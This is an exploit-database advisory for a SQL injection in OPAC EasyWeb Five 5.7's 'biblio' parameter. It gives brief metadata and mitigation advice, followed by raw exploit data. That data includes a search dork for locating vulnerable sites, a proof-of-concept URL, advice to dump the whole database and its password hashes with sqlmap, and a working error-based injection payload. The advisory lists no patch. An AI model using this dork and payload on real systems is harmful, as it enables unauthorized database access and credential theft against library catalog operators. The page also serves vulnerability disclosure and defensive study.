OPAC EasyWeb Five 5.7 - 'biblio' SQL Injection

vendor:

OPAC EasyWeb Five

by:

Dino Barlattani

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: OPAC EasyWeb Five

Affected Version From: 5.7

Affected Version To: 5.7

Patch Exists: NO

Related CWE: N/A

CPE: a:nexusfi:opac_easyweb_five:5.7

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: PHP

2018

OPAC EasyWeb Five 5.7 – ‘biblio’ SQL Injection

A SQL injection vulnerability exists in OPAC EasyWeb Five 5.7. An attacker can send a malicious SQL query to the vulnerable parameter 'biblio' in the 'index.php' script to execute arbitrary SQL commands in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user input to ensure that it conforms to the expected format, using whitelists to define all allowed inputs.

Source

Exploit-DB raw data:

# Exploit Title: OPAC EasyWeb Five 5.7 - 'biblio' SQL Injection
# Dork: inurl:"index.php?scelta=campi"
# Date: 2018-10-02
# Exploit Author: Dino Barlattani
# Vendor Homepage: http://www.nexusfi.it/
# Software Link: http://www.nexusfi.it/easyweb.php
# Version: 5.7
# Category: Webapps
# Platform: PHP
# CVE: N/A

# POC:
# http://(server ip)/easyweb/w2001/index.php?scelta=campi&&biblio=RT10AH[SQL]&lang=

# You can use sqlmap for dump entire database and dumping hash

scelta=campi&&biblio=RT10AH' AND ROW(3677,8383)>(SELECT
COUNT(*),CONCAT(0x7176627a71,(SELECT
(ELT(3677=3677,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM (SELECT 8278 UNION
SELECT 2746 UNION SELECT 1668 UNION SELECT 1526)a GROUP BY x) AND
'CrYc'='CrYc&lang=